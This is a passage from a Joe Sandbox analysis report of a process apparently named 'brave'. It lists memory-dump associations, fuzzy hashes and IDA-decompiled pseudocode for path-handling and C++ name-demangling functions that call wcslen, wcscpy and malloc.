Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Temp$FileNamePath
String ID:
API String ID: 3285503233-0
Opcode ID: a36c255382f679e79db51f353ae47516e0c81a59047a74ca63f1b497fb31ef1a
Instruction ID: 854752382e441cad7810d6d2f6bf1f93e4e329b208c7de2dea4e4e5276231d1c
Opcode Fuzzy Hash: a36c255382f679e79db51f353ae47516e0c81a59047a74ca63f1b497fb31ef1a
Instruction Fuzzy Hash: 6F31A3A260878585EA508612BD5476AA361FB867FCF540331EFBC67BD8DFBCD0458B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B24000 Relevance: 2.5, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00007FF67FF652B24000(void* __eax, void* __edi, void* __esp, void* __rax, void* __rcx) {
				char _v584;
				int _t9;
				void* _t12;
				void* _t26;
				signed long long _t27;
				void* _t36;
				void* _t37;

				r12d = 0;
				_t35 =  &_v584;
				0x52b41630();
				_t37 = __rax;
				goto 0x52b2403f;
				asm("o16 nop [cs:eax+eax]");
				if (__eax == 0x2f) goto 0x52b24049;
				_t27 = _t26 + 1;
				if (__rax - _t27 < 0) goto 0x52b2407c;
				_t9 =  *(__rcx + _t27 * 2) & 0x0000ffff;
				if (_t9 != 0x5c) goto 0x52b24030;
				memset(__edi, _t9, 0x41 << 0);
				0x52b41638();
				 *((short*)( &_v584 + _t27 * 2)) = 0;
				_t12 = E00007FF67FF652B23CD0(_t36, _t35); // executed
				if (_t37 - _t27 + 1 >= 0) goto 0x52b2403f;
				return _t12;
			}

0x7ff652b24011
0x7ff652b24017
0x7ff652b2401c
0x7ff652b24021
0x7ff652b24024
0x7ff652b24026
0x7ff652b24034
0x7ff652b24036
0x7ff652b2403d
0x7ff652b2403f
0x7ff652b24047
0x7ff652b24059
0x7ff652b2405f
0x7ff652b24069
0x7ff652b24072
0x7ff652b2407a
0x7ff652b2408b

APIs

wcslen.MSVCRT ref: 00007FF652B2401C
wcscpy.MSVCRT ref: 00007FF652B2405F

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: wcscpywcslen
String ID:
API String ID: 225642448-0
Opcode ID: 97bf6b18d38952cc1e7bab5118d0ebb15cef15114d82f46dfd9f4697655be916
Instruction ID: 1d1ce4cc2db496a1d3008b3a9dc81c2f322c03a621bb39b2054941dd77f99f7b
Opcode Fuzzy Hash: 97bf6b18d38952cc1e7bab5118d0ebb15cef15114d82f46dfd9f4697655be916
Instruction Fuzzy Hash: 4EF07842F1929944EA605E15AC003F31561BB053DCF8C0532EE8D61A91ECECE1C2C206

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B26121 Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00007FF67FF652B26121(void* __ebx, void* __edx, signed char __rax, void* __rbx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t150;
				signed int _t153;
				void* _t157;
				signed int _t158;
				signed int _t169;
				signed int _t180;
				signed int _t182;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t197;
				signed int _t200;
				signed int _t203;
				void* _t214;
				void* _t240;
				signed char* _t245;
				long long* _t249;
				long long* _t252;
				intOrPtr* _t255;
				intOrPtr* _t258;
				intOrPtr* _t261;
				intOrPtr* _t264;
				char* _t265;
				signed char* _t266;
				intOrPtr* _t269;
				intOrPtr* _t272;
				signed char* _t275;
				intOrPtr* _t278;
				signed char* _t279;
				signed char* _t281;
				signed char* _t282;
				intOrPtr* _t321;
				intOrPtr* _t325;
				signed char* _t326;
				signed char* _t327;
				long long _t336;
				void* _t343;

				_t150 =  *(__rbx + 0x28);
				if (_t150 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526bc;
				_t321 = (_t150 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t321 + 4)) = 0;
				 *(__rbx + 0x28) = _t150 + 1;
				_a40 = _t321;
				 *_t321 = 0x2c;
				_t153 = ( *(__r8 + 2) & 0x000000ff) - 0x30;
				_t214 = _t153 - 9;
				 *((short*)(_t321 + 0x18)) = (_t153 & 0xffffff00 | _t214 < 0x00000000) & 0x000000ff;
				if (_t214 > 0) goto 0x52b26174;
				E00007FF67FF652B24E90(__rax, __rbx, __rdx, __r8, _t343);
				E00007FF67FF652B25BC0();
				_a40[0x10] = __rax;
				if (_a40[0x10] == 0) goto 0x52b25c20;
				_t157 = E00007FF67FF652B24E90(_a40, __rbx, __rdx, __r8, _t343);
				_t245 =  *(__rbx + 0x18);
				if (( *_t245 & 0x000000ff) == 0) goto 0x52b261ae;
				_t305 =  &(_t245[1]);
				 *(__rbx + 0x18) =  &(_t245[1]);
				_a40[0x1a] = ( *_t245 & 0 | ( *_t245 & 0x000000ff) == 0x00000073) & 0x000000ff;
				_t180 =  *(__rbx + 0x28);
				if (_t180 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b25c20;
				_t249 = (_t180 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *(__rbx + 0x28) = _t180 + 1;
				 *_t249 = 0;
				 *((intOrPtr*)(_t249 + 8)) = 0;
				 *((long long*)(_t249 + 0x10)) = "decltype(auto)";
				 *((intOrPtr*)(_t249 + 0x18)) = 0xe;
				_t182 =  *(__rbx + 0x28);
				if (_t182 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b25c20;
				_t252 = (_t182 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *(__rbx + 0x28) = _t182 + 1;
				 *_t252 = 0;
				 *((intOrPtr*)(_t252 + 8)) = 0;
				 *((long long*)(_t252 + 0x10)) = 0x52dd3a36;
				 *((intOrPtr*)(_t252 + 0x18)) = 4;
				_t184 =  *(__rbx + 0x28);
				if (_t184 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526c9;
				_t255 = (_t184 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t255 + 4)) = 0;
				 *(__rbx + 0x28) = _t184 + 1;
				 *_t255 = 0x27;
				 *((long long*)(_t255 + 0x10)) = 0x52dd5380;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 4;
				_t186 =  *(__rbx + 0x28);
				if (_t186 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526dc;
				_t258 = (_t186 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t258 + 4)) = 0;
				 *(__rbx + 0x28) = _t186 + 1;
				 *_t258 = 0x27;
				 *((long long*)(_t258 + 0x10)) = 0x52dd5320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t188 =  *(__rbx + 0x28);
				if (_t188 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526a9;
				_t261 = (_t188 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t261 + 4)) = 0;
				 *(__rbx + 0x28) = _t188 + 1;
				 *_t261 = 0x27;
				 *((long long*)(_t261 + 0x10)) = 0x52dd53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t190 =  *(__rbx + 0x28);
				if (_t190 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52702;
				_t264 = (_t190 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t264 + 4)) = 0;
				 *(__rbx + 0x28) = _t190 + 1;
				 *_t264 = 0x27;
				 *((long long*)(_t264 + 0x10)) = 0x52dd5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x52b25c22;
				 *_t264 =  *_t264 + _t157;
				_t158 =  *(__rbx + 0x28);
				if (_t158 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b25c20;
				_t325 = (_t158 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t325 + 4)) = 0;
				 *(__rbx + 0x28) = _t158 + 1;
				 *_t325 = 0x42;
				 *((intOrPtr*)(_t325 + 0x10)) = E00007FF67FF652B24E90(_t264, __rbx, _t305, __r8, _t343);
				_t265 =  *(__rbx + 0x18);
				if ( *_t265 != 0x5f) goto 0x52b25c20;
				_t266 = _t265 + 1;
				 *(__rbx + 0x18) = _t266;
				E00007FF67FF652B25BC0();
				E00007FF67FF652B24DD0();
				_a40 = _t266;
				_t193 =  *(__rbx + 0x28);
				if (_t193 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52670;
				_t269 = (_t193 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t269 + 4)) = 0;
				 *(__rbx + 0x28) = _t193 + 1;
				 *_t269 = 0x27;
				 *((long long*)(_t269 + 0x10)) = 0x52dd5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t195 =  *(__rbx + 0x28);
				if (_t195 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52715;
				_t272 = (_t195 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t272 + 4)) = 0;
				 *(__rbx + 0x28) = _t195 + 1;
				 *_t272 = 0x27;
				 *((long long*)(_t272 + 0x10)) = 0x52dd5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t197 =  *(__rbx + 0x28);
				if (_t197 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t275 = (_t197 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t275 + 4)) = 0;
				 *(__rbx + 0x28) = _t197 + 1;
				 *_t275 = 0x27;
				 *((long long*)(_t275 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t275;
				_t200 =  *(__rbx + 0x28);
				if (_t200 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t278 = (_t200 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t278 + 4)) = 0;
				 *(__rbx + 0x28) = _t200 + 1;
				 *_t278 = 0x27;
				 *((long long*)(_t278 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t278, __rbx);
				_a40 = _t278;
				if (_t278 == 0) goto 0x52b25c20;
				if ( *_t278 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t279 = _t278 + 1;
				 *(__rbx + 0x18) = _t279;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t279;
				_t326 = _t279;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t326[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t326;
				_t281 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t336 = _a40;
				if (_t336 == 0) goto 0x52b25c20;
				_t203 =  *(__rbx + 0x38);
				if (_t203 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t203 * 8)) = _t336;
				 *(__rbx + 0x38) = _t203 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t281;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t336 + 3;
				E00007FF67FF652B27F20(_t281, __rbx);
				_t327 = _t281;
				if (_t281 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t327);
				_push(__rbx);
				_t282 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t282[1]);
				r10d =  *_t282 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t169 = (r8d >> 0x1f) + r8d >> 1;
				_t240 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t169 + _t169 * 2) * 8)))) - r10b;
				if (_t240 == 0) goto 0x52b26680;
				if (_t240 <= 0) goto 0x52b266c0;
				r8d = _t169;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b26121
0x7ff652b26127
0x7ff652b26137
0x7ff652b2613b
0x7ff652b26143
0x7ff652b26146
0x7ff652b2614b
0x7ff652b26156
0x7ff652b26159
0x7ff652b26161
0x7ff652b26165
0x7ff652b2616a
0x7ff652b26177
0x7ff652b2617c
0x7ff652b2618a
0x7ff652b26193
0x7ff652b26198
0x7ff652b261a1
0x7ff652b261a3
0x7ff652b261a7
0x7ff652b261bc
0x7ff652b261c5
0x7ff652b261cb
0x7ff652b261e2
0x7ff652b261e6
0x7ff652b261e9
0x7ff652b261f0
0x7ff652b261f7
0x7ff652b261fb
0x7ff652b26207
0x7ff652b2620d
0x7ff652b26224
0x7ff652b26228
0x7ff652b2622b
0x7ff652b26232
0x7ff652b26239
0x7ff652b2623d
0x7ff652b26249
0x7ff652b2624f
0x7ff652b26266
0x7ff652b2626a
0x7ff652b26272
0x7ff652b26275
0x7ff652b2627b
0x7ff652b2627f
0x7ff652b26288
0x7ff652b2628e
0x7ff652b262a5
0x7ff652b262a9
0x7ff652b262b1
0x7ff652b262b4
0x7ff652b262ba
0x7ff652b262be
0x7ff652b262c7
0x7ff652b262cd
0x7ff652b262e4
0x7ff652b262e8
0x7ff652b262f0
0x7ff652b262f3
0x7ff652b262f9
0x7ff652b262fd
0x7ff652b26306
0x7ff652b2630c
0x7ff652b26323
0x7ff652b26327
0x7ff652b2632f
0x7ff652b26332
0x7ff652b26338
0x7ff652b2633c
0x7ff652b26340
0x7ff652b2634e
0x7ff652b26350
0x7ff652b26356
0x7ff652b26369
0x7ff652b2636d
0x7ff652b26375
0x7ff652b26378
0x7ff652b26383
0x7ff652b26386
0x7ff652b2638d
0x7ff652b26393
0x7ff652b2639a
0x7ff652b2639e
0x7ff652b263b1
0x7ff652b263b6
0x7ff652b263c0
0x7ff652b263c6
0x7ff652b263dd
0x7ff652b263e1
0x7ff652b263e9
0x7ff652b263ec
0x7ff652b263f2
0x7ff652b263f6
0x7ff652b263ff
0x7ff652b26405
0x7ff652b2641c
0x7ff652b26420
0x7ff652b26428
0x7ff652b2642b
0x7ff652b26431
0x7ff652b26435
0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f1911072c80b76115ef9c94903d4da69b44409036a35aa95ff02e775109f09a9
Instruction ID: b5f6c94643b0ce8531e84833adba529c37764a08a0a51af2912ba1e6f5fd986f
Opcode Fuzzy Hash: f1911072c80b76115ef9c94903d4da69b44409036a35aa95ff02e775109f09a9
Instruction Fuzzy Hash: D7317973A09B0581E7248F14EC813AA37A0EB9579CF184236D6CC973A5DFBCE680C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B25CC8 Relevance: 1.3, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B25CC8(void* __edx, void* __rbx, void* __r8, long long _a40) {
				void* _t19;
				signed int _t20;
				signed int _t25;
				long long _t35;
				long long _t43;

				_t20 =  *(__rbx + 0x28);
				_t43 = (__edx - 0x61 << 5) + 0x52dd4fe0;
				if (_t20 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52696;
				_t35 = (_t20 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t35 + 4)) = 0;
				 *(__rbx + 0x28) = _t20 + 1;
				 *((long long*)(_t35 + 0x10)) = _t43;
				 *_t35 = 0x27;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) +  *((intOrPtr*)(_t43 + 8));
				 *((long long*)(__rbx + 0x18)) = __r8 + 1;
				_t19 = E00007FF67FF652B26EE0(_t35, __rbx);
				_a40 = _t35;
				if (_t35 == 0) goto 0x52b25c20;
				_t25 =  *(__rbx + 0x38);
				if (_t25 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t25 * 8)) = _t35;
				 *(__rbx + 0x38) = _t25 + 1;
				return _t19;
			}

0x7ff652b25cd2
0x7ff652b25cdd
0x7ff652b25ce3
0x7ff652b25cf7
0x7ff652b25cfb
0x7ff652b25d03
0x7ff652b25d06
0x7ff652b25d0d
0x7ff652b25d13
0x7ff652b25d16
0x7ff652b25d23
0x7ff652b25d28
0x7ff652b25d33
0x7ff652b25d39
0x7ff652b25d3f
0x7ff652b25d4f
0x7ff652b25d58
0x7ff652b25d65

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 481313779c530b80ad29adb7c36aba79e4ffeb0080f416c7aa4c906f5a1563bf
Instruction ID: a4a5e7179ab06c406a706c94a30e66789a6a624165d47f446e89270d9f6885c6
Opcode Fuzzy Hash: 481313779c530b80ad29adb7c36aba79e4ffeb0080f416c7aa4c906f5a1563bf
Instruction Fuzzy Hash: 17312672A09B0482EB20CF18F8953A977A0FB9479DF294625C6CC473A5DFBDD584C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B21670 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF652B2172F

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 47150c400661e288aa599803cb5707d173a492a52ae042cb663064bb588da808
Instruction ID: 0eb1d49d01187e3f9568fa1e2c3420cb26003a3280c7b4aed1deb09690f5cd59
Opcode Fuzzy Hash: 47150c400661e288aa599803cb5707d173a492a52ae042cb663064bb588da808
Instruction Fuzzy Hash: F221F65291D7C186EB128B28AC013B97BA1AB9A74CF4D8270DECD56752EFAD90448310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B263C0 Relevance: 1.3, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00007FF67FF652B263C0(void* __rbx, signed char* _a40) {
				signed int _t77;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				signed int _t88;
				signed int _t91;
				void* _t113;
				intOrPtr* _t118;
				intOrPtr* _t121;
				signed char* _t124;
				intOrPtr* _t127;
				signed char* _t128;
				signed char* _t130;
				signed char* _t131;
				signed char* _t154;
				signed char* _t155;
				long long _t162;

				_t81 =  *(__rbx + 0x28);
				if (_t81 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52670;
				_t118 = (_t81 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t118 + 4)) = 0;
				 *(__rbx + 0x28) = _t81 + 1;
				 *_t118 = 0x27;
				 *((long long*)(_t118 + 0x10)) = 0x52dd5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t83 =  *(__rbx + 0x28);
				if (_t83 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52715;
				_t121 = (_t83 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t121 + 4)) = 0;
				 *(__rbx + 0x28) = _t83 + 1;
				 *_t121 = 0x27;
				 *((long long*)(_t121 + 0x10)) = 0x52dd5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t85 =  *(__rbx + 0x28);
				if (_t85 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t124 = (_t85 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t124 + 4)) = 0;
				 *(__rbx + 0x28) = _t85 + 1;
				 *_t124 = 0x27;
				 *((long long*)(_t124 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t124;
				_t88 =  *(__rbx + 0x28);
				if (_t88 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t127 = (_t88 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t127 + 4)) = 0;
				 *(__rbx + 0x28) = _t88 + 1;
				 *_t127 = 0x27;
				 *((long long*)(_t127 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t127, __rbx);
				_a40 = _t127;
				if (_t127 == 0) goto 0x52b25c20;
				if ( *_t127 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t128 = _t127 + 1;
				 *(__rbx + 0x18) = _t128;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t128;
				_t154 = _t128;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t154[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t154;
				_t130 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t162 = _a40;
				if (_t162 == 0) goto 0x52b25c20;
				_t91 =  *(__rbx + 0x38);
